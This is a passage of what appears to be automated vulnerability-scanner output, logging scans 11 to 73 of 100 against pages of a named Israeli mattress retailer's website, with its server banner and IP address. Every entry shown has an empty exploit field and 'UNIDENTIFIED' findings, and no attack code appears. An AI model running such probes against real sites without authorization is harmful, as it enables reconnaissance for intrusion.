  1424. |_[ + ] [ 11 / 100 ]-[04:31:38] [ - ]
  1425. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-חדרה ]
  1426. |_[ + ] Exploit::
  1427. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1428. |_[ + ] More details:: / - / , ISP:
  1429. |_[ + ] Found:: UNIDENTIFIED
  1430.  
  1431. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1432. |_[ + ] [ 12 / 100 ]-[04:31:41] [ - ]
  1433. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-בגבת ]
  1434. |_[ + ] Exploit::
  1435. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1436. |_[ + ] More details:: / - / , ISP:
  1437. |_[ + ] Found:: UNIDENTIFIED
  1438.  
  1439. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1440. |_[ + ] [ 13 / 100 ]-[04:31:43] [ - ]
  1441. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-במנוף ]
  1442. |_[ + ] Exploit::
  1443. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1444. |_[ + ] More details:: / - / , ISP:
  1445. |_[ + ] Found:: UNIDENTIFIED
  1446.  
  1447. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1448. |_[ + ] [ 14 / 100 ]-[04:31:45] [ - ]
  1449. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-סכנין ]
  1450. |_[ + ] Exploit::
  1451. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1452. |_[ + ] More details:: / - / , ISP:
  1453. |_[ + ] Found:: UNIDENTIFIED
  1454.  
  1455. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1456. |_[ + ] [ 15 / 100 ]-[04:31:48] [ - ]
  1457. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-שרונה ]
  1458. |_[ + ] Exploit::
  1459. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1460. |_[ + ] More details:: / - / , ISP:
  1461. |_[ + ] Found:: UNIDENTIFIED
  1462.  
  1463. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1464. |_[ + ] [ 16 / 100 ]-[04:31:50] [ - ]
  1465. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בשעב ]
  1466. |_[ + ] Exploit::
  1467. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1468. |_[ + ] More details:: / - / , ISP:
  1469. |_[ + ] Found:: UNIDENTIFIED
  1470.  
  1471. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1472. |_[ + ] [ 17 / 100 ]-[04:31:52] [ - ]
  1473. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-במסד ]
  1474. |_[ + ] Exploit::
  1475. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1476. |_[ + ] More details:: / - / , ISP:
  1477. |_[ + ] Found:: UNIDENTIFIED
  1478.  
  1479. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1480. |_[ + ] [ 18 / 100 ]-[04:31:55] [ - ]
  1481. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-יזרעם ]
  1482. |_[ + ] Exploit::
  1483. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1484. |_[ + ] More details:: / - / , ISP:
  1485. |_[ + ] Found:: UNIDENTIFIED
  1486.  
  1487. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1488. |_[ + ] [ 19 / 100 ]-[04:31:57] [ - ]
  1489. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בגנות ]
  1490. |_[ + ] Exploit::
  1491. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1492. |_[ + ] More details:: / - / , ISP:
  1493. |_[ + ] Found:: UNIDENTIFIED
  1494.  
  1495. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1496. |_[ + ] [ 20 / 100 ]-[04:31:59] [ - ]
  1497. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בדור ]
  1498. |_[ + ] Exploit::
  1499. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1500. |_[ + ] More details:: / - / , ISP:
  1501. |_[ + ] Found:: UNIDENTIFIED
  1502.  
  1503. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1504. |_[ + ] [ 21 / 100 ]-[04:32:01] [ - ]
  1505. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-בזול-מיצר ]
  1506. |_[ + ] Exploit::
  1507. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1508. |_[ + ] More details:: / - / , ISP:
  1509. |_[ + ] Found:: UNIDENTIFIED
  1510.  
  1511. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1512. |_[ + ] [ 22 / 100 ]-[04:32:03] [ - ]
  1513. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-בסכנין ]
  1514. |_[ + ] Exploit::
  1515. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1516. |_[ + ] More details:: / - / , ISP:
  1517. |_[ + ] Found:: UNIDENTIFIED
  1518.  
  1519. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1520. |_[ + ] [ 23 / 100 ]-[04:32:06] [ - ]
  1521. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-אחיהוד ]
  1522. |_[ + ] Exploit::
  1523. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1524. |_[ + ] More details:: / - / , ISP:
  1525. |_[ + ] Found:: UNIDENTIFIED
  1526.  
  1527. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1528. |_[ + ] [ 24 / 100 ]-[04:32:08] [ - ]
  1529. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-באלעד ]
  1530. |_[ + ] Exploit::
  1531. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1532. |_[ + ] More details:: / - / , ISP:
  1533. |_[ + ] Found:: UNIDENTIFIED
  1534.  
  1535. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1536. |_[ + ] [ 25 / 100 ]-[04:32:10] [ - ]
  1537. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-ב1000-בחנתון ]
  1538. |_[ + ] Exploit::
  1539. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1540. |_[ + ] More details:: / - / , ISP:
  1541. |_[ + ] Found:: UNIDENTIFIED
  1542.  
  1543. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1544. |_[ + ] [ 26 / 100 ]-[04:32:13] [ - ]
  1545. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בצפת ]
  1546. |_[ + ] Exploit::
  1547. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1548. |_[ + ] More details:: / - / , ISP:
  1549. |_[ + ] Found:: UNIDENTIFIED
  1550.  
  1551. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1552. |_[ + ] [ 27 / 100 ]-[04:32:15] [ - ]
  1553. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-200-באלרואי ]
  1554. |_[ + ] Exploit::
  1555. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1556. |_[ + ] More details:: / - / , ISP:
  1557. |_[ + ] Found:: UNIDENTIFIED
  1558.  
  1559. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1560. |_[ + ] [ 28 / 100 ]-[04:32:17] [ - ]
  1561. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-בבצרה ]
  1562. |_[ + ] Exploit::
  1563. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1564. |_[ + ] More details:: / - / , ISP:
  1565. |_[ + ] Found:: UNIDENTIFIED
  1566.  
  1567. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1568. |_[ + ] [ 29 / 100 ]-[04:32:19] [ - ]
  1569. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-בעזיר ]
  1570. |_[ + ] Exploit::
  1571. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1572. |_[ + ] More details:: / - / , ISP:
  1573. |_[ + ] Found:: UNIDENTIFIED
  1574.  
  1575. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1576. |_[ + ] [ 30 / 100 ]-[04:32:22] [ - ]
  1577. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זולים-בגאולים ]
  1578. |_[ + ] Exploit::
  1579. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1580. |_[ + ] More details:: / - / , ISP:
  1581. |_[ + ] Found:: UNIDENTIFIED
  1582.  
  1583. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1584. |_[ + ] [ 31 / 100 ]-[04:32:24] [ - ]
  1585. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-יוקרתיים-בנופית ]
  1586. |_[ + ] Exploit::
  1587. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1588. |_[ + ] More details:: / - / , ISP:
  1589. |_[ + ] Found:: UNIDENTIFIED
  1590.  
  1591. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1592. |_[ + ] [ 32 / 100 ]-[04:32:26] [ - ]
  1593. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בחיפה ]
  1594. |_[ + ] Exploit::
  1595. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1596. |_[ + ] More details:: / - / , ISP:
  1597. |_[ + ] Found:: UNIDENTIFIED
  1598.  
  1599. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1600. |_[ + ] [ 33 / 100 ]-[04:32:28] [ - ]
  1601. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-באעצם ]
  1602. |_[ + ] Exploit::
  1603. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1604. |_[ + ] More details:: / - / , ISP:
  1605. |_[ + ] Found:: UNIDENTIFIED
  1606.  
  1607. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1608. |_[ + ] [ 34 / 100 ]-[04:32:31] [ - ]
  1609. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-פשוטים-בכנרת ]
  1610. |_[ + ] Exploit::
  1611. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1612. |_[ + ] More details:: / - / , ISP:
  1613. |_[ + ] Found:: UNIDENTIFIED
  1614.  
  1615. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1616. |_[ + ] [ 35 / 100 ]-[04:32:34] [ - ]
  1617. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-אלמות ]
  1618. |_[ + ] Exploit::
  1619. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1620. |_[ + ] More details:: / - / , ISP:
  1621. |_[ + ] Found:: UNIDENTIFIED
  1622.  
  1623. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1624. |_[ + ] [ 36 / 100 ]-[04:32:36] [ - ]
  1625. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-כרמיה ]
  1626. |_[ + ] Exploit::
  1627. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1628. |_[ + ] More details:: / - / , ISP:
  1629. |_[ + ] Found:: UNIDENTIFIED
  1630.  
  1631. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1632. |_[ + ] [ 37 / 100 ]-[04:32:39] [ - ]
  1633. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בגןנר ]
  1634. |_[ + ] Exploit::
  1635. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1636. |_[ + ] More details:: / - / , ISP:
  1637. |_[ + ] Found:: UNIDENTIFIED
  1638.  
  1639. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1640. |_[ + ] [ 38 / 100 ]-[04:32:41] [ - ]
  1641. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-ומיטות-במזרעה ]
  1642. |_[ + ] Exploit::
  1643. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1644. |_[ + ] More details:: / - / , ISP:
  1645. |_[ + ] Found:: UNIDENTIFIED
  1646.  
  1647. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1648. |_[ + ] [ 39 / 100 ]-[04:32:43] [ - ]
  1649. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-באחיטוב ]
  1650. |_[ + ] Exploit::
  1651. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1652. |_[ + ] More details:: / - / , ISP:
  1653. |_[ + ] Found:: UNIDENTIFIED
  1654.  
  1655. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1656. |_[ + ] [ 40 / 100 ]-[04:32:46] [ - ]
  1657. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-שפיים ]
  1658. |_[ + ] Exploit::
  1659. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1660. |_[ + ] More details:: / - / , ISP:
  1661. |_[ + ] Found:: UNIDENTIFIED
  1662.  
  1663. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1664. |_[ + ] [ 41 / 100 ]-[04:32:49] [ - ]
  1665. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-איתנים ]
  1666. |_[ + ] Exploit::
  1667. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1668. |_[ + ] More details:: / - / , ISP:
  1669. |_[ + ] Found:: UNIDENTIFIED
  1670.  
  1671. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1672. |_[ + ] [ 42 / 100 ]-[04:32:51] [ - ]
  1673. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ירדנה ]
  1674. |_[ + ] Exploit::
  1675. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1676. |_[ + ] More details:: / - / , ISP:
  1677. |_[ + ] Found:: UNIDENTIFIED
  1678.  
  1679. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1680. |_[ + ] [ 43 / 100 ]-[04:32:54] [ - ]
  1681. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-בזול-רחובות ]
  1682. |_[ + ] Exploit::
  1683. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1684. |_[ + ] More details:: / - / , ISP:
  1685. |_[ + ] Found:: UNIDENTIFIED
  1686.  
  1687. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1688. |_[ + ] [ 44 / 100 ]-[04:32:56] [ - ]
  1689. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-אדורה ]
  1690. |_[ + ] Exploit::
  1691. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1692. |_[ + ] More details:: / - / , ISP:
  1693. |_[ + ] Found:: UNIDENTIFIED
  1694.  
  1695. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1696. |_[ + ] [ 45 / 100 ]-[04:32:59] [ - ]
  1697. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-במסד ]
  1698. |_[ + ] Exploit::
  1699. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1700. |_[ + ] More details:: / - / , ISP:
  1701. |_[ + ] Found:: UNIDENTIFIED
  1702.  
  1703. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1704. |_[ + ] [ 46 / 100 ]-[04:33:01] [ - ]
  1705. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרונים-דבוריה ]
  1706. |_[ + ] Exploit::
  1707. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1708. |_[ + ] More details:: / - / , ISP:
  1709. |_[ + ] Found:: UNIDENTIFIED
  1710.  
  1711. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1712. |_[ + ] [ 47 / 100 ]-[04:33:03] [ - ]
  1713. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בחוגלה ]
  1714. |_[ + ] Exploit::
  1715. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1716. |_[ + ] More details:: / - / , ISP:
  1717. |_[ + ] Found:: UNIDENTIFIED
  1718.  
  1719. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1720. |_[ + ] [ 48 / 100 ]-[04:33:05] [ - ]
  1721. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-מומלצים-באלומות ]
  1722. |_[ + ] Exploit::
  1723. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1724. |_[ + ] More details:: / - / , ISP:
  1725. |_[ + ] Found:: UNIDENTIFIED
  1726.  
  1727. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1728. |_[ + ] [ 49 / 100 ]-[04:33:08] [ - ]
  1729. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-דקים-בקטמון ]
  1730. |_[ + ] Exploit::
  1731. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1732. |_[ + ] More details:: / - / , ISP:
  1733. |_[ + ] Found:: UNIDENTIFIED
  1734.  
  1735. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1736. |_[ + ] [ 50 / 100 ]-[04:33:10] [ - ]
  1737. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-באוהד ]
  1738. |_[ + ] Exploit::
  1739. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1740. |_[ + ] More details:: / - / , ISP:
  1741. |_[ + ] Found:: UNIDENTIFIED
  1742.  
  1743. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1744. |_[ + ] [ 51 / 100 ]-[04:33:12] [ - ]
  1745. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בערד ]
  1746. |_[ + ] Exploit::
  1747. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1748. |_[ + ] More details:: / - / , ISP:
  1749. |_[ + ] Found:: UNIDENTIFIED
  1750.  
  1751. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1752. |_[ + ] [ 52 / 100 ]-[04:33:15] [ - ]
  1753. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-יפיע ]
  1754. |_[ + ] Exploit::
  1755. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1756. |_[ + ] More details:: / - / , ISP:
  1757. |_[ + ] Found:: UNIDENTIFIED
  1758.  
  1759. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1760. |_[ + ] [ 53 / 100 ]-[04:33:17] [ - ]
  1761. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-פשוטים-בנצרת ]
  1762. |_[ + ] Exploit::
  1763. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1764. |_[ + ] More details:: / - / , ISP:
  1765. |_[ + ] Found:: UNIDENTIFIED
  1766.  
  1767. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1768. |_[ + ] [ 54 / 100 ]-[04:33:19] [ - ]
  1769. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-בשלומי ]
  1770. |_[ + ] Exploit::
  1771. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1772. |_[ + ] More details:: / - / , ISP:
  1773. |_[ + ] Found:: UNIDENTIFIED
  1774.  
  1775. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1776. |_[ + ] [ 55 / 100 ]-[04:33:21] [ - ]
  1777. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-באביר-יעקב ]
  1778. |_[ + ] Exploit::
  1779. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1780. |_[ + ] More details:: / - / , ISP:
  1781. |_[ + ] Found:: UNIDENTIFIED
  1782.  
  1783. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1784. |_[ + ] [ 56 / 100 ]-[04:33:24] [ - ]
  1785. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בהדסים ]
  1786. |_[ + ] Exploit::
  1787. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1788. |_[ + ] More details:: / - / , ISP:
  1789. |_[ + ] Found:: UNIDENTIFIED
  1790.  
  1791. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1792. |_[ + ] [ 57 / 100 ]-[04:33:26] [ - ]
  1793. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-בבני-עיש ]
  1794. |_[ + ] Exploit::
  1795. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1796. |_[ + ] More details:: / - / , ISP:
  1797. |_[ + ] Found:: UNIDENTIFIED
  1798.  
  1799. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1800. |_[ + ] [ 58 / 100 ]-[04:33:28] [ - ]
  1801. |_[ + ] Target:: [ http://babylon-woodline.co.il/index.1.html ]
  1802. |_[ + ] Exploit::
  1803. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1804. |_[ + ] More details:: / - / , ISP:
  1805. |_[ + ] Found:: UNIDENTIFIED
  1806.  
  1807. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1808. |_[ + ] [ 59 / 100 ]-[04:33:30] [ - ]
  1809. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בהודיות ]
  1810. |_[ + ] Exploit::
  1811. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1812. |_[ + ] More details:: / - / , ISP:
  1813. |_[ + ] Found:: UNIDENTIFIED
  1814.  
  1815. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1816. |_[ + ] [ 60 / 100 ]-[04:33:33] [ - ]
  1817. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-ריחן ]
  1818. |_[ + ] Exploit::
  1819. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1820. |_[ + ] More details:: / - / , ISP:
  1821. |_[ + ] Found:: UNIDENTIFIED
  1822.  
  1823. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1824. |_[ + ] [ 61 / 100 ]-[04:33:35] [ - ]
  1825. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-זולים-קדימה ]
  1826. |_[ + ] Exploit::
  1827. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1828. |_[ + ] More details:: / - / , ISP:
  1829. |_[ + ] Found:: UNIDENTIFIED
  1830.  
  1831. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1832. |_[ + ] [ 62 / 100 ]-[04:33:37] [ - ]
  1833. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-בבורגתא ]
  1834. |_[ + ] Exploit::
  1835. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1836. |_[ + ] More details:: / - / , ISP:
  1837. |_[ + ] Found:: UNIDENTIFIED
  1838.  
  1839. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1840. |_[ + ] [ 63 / 100 ]-[04:33:40] [ - ]
  1841. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ירושלים ]
  1842. |_[ + ] Exploit::
  1843. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1844. |_[ + ] More details:: / - / , ISP:
  1845. |_[ + ] Found:: UNIDENTIFIED
  1846.  
  1847. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1848. |_[ + ] [ 64 / 100 ]-[04:33:42] [ - ]
  1849. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ריחן ]
  1850. |_[ + ] Exploit::
  1851. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1852. |_[ + ] More details:: / - / , ISP:
  1853. |_[ + ] Found:: UNIDENTIFIED
  1854.  
  1855. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1856. |_[ + ] [ 65 / 100 ]-[04:33:44] [ - ]
  1857. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-160-בביריה ]
  1858. |_[ + ] Exploit::
  1859. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1860. |_[ + ] More details:: / - / , ISP:
  1861. |_[ + ] Found:: UNIDENTIFIED
  1862.  
  1863. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1864. |_[ + ] [ 66 / 100 ]-[04:33:46] [ - ]
  1865. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ברטעה ]
  1866. |_[ + ] Exploit::
  1867. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1868. |_[ + ] More details:: / - / , ISP:
  1869. |_[ + ] Found:: UNIDENTIFIED
  1870.  
  1871. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1872. |_[ + ] [ 67 / 100 ]-[04:33:49] [ - ]
  1873. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-במגאר ]
  1874. |_[ + ] Exploit::
  1875. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1876. |_[ + ] More details:: / - / , ISP:
  1877. |_[ + ] Found:: UNIDENTIFIED
  1878.  
  1879. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1880. |_[ + ] [ 68 / 100 ]-[04:33:51] [ - ]
  1881. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-טבעיים-בפצאל ]
  1882. |_[ + ] Exploit::
  1883. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1884. |_[ + ] More details:: / - / , ISP:
  1885. |_[ + ] Found:: UNIDENTIFIED
  1886.  
  1887. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1888. |_[ + ] [ 69 / 100 ]-[04:33:53] [ - ]
  1889. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בחורשים ]
  1890. |_[ + ] Exploit::
  1891. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1892. |_[ + ] More details:: / - / , ISP:
  1893. |_[ + ] Found:: UNIDENTIFIED
  1894.  
  1895. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1896. |_[ + ] [ 70 / 100 ]-[04:33:55] [ - ]
  1897. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-מחניים ]
  1898. |_[ + ] Exploit::
  1899. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1900. |_[ + ] More details:: / - / , ISP:
  1901. |_[ + ] Found:: UNIDENTIFIED
  1902.  
  1903. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1904. |_[ + ] [ 71 / 100 ]-[04:33:57] [ - ]
  1905. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-ביכיני ]
  1906. |_[ + ] Exploit::
  1907. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1908. |_[ + ] More details:: / - / , ISP:
  1909. |_[ + ] Found:: UNIDENTIFIED
  1910.  
  1911. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1912. |_[ + ] [ 72 / 100 ]-[04:34:00] [ - ]
  1913. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קשים-באודם ]
  1914. |_[ + ] Exploit::
  1915. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1916. |_[ + ] More details:: / - / , ISP:
  1917. |_[ + ] Found:: UNIDENTIFIED
  1918.  
  1919. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1920. |_[ + ] [ 73 / 100 ]-[04:34:02] [ - ]
  1921. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-סלמה ]
  1922. |_[ + ] Exploit::
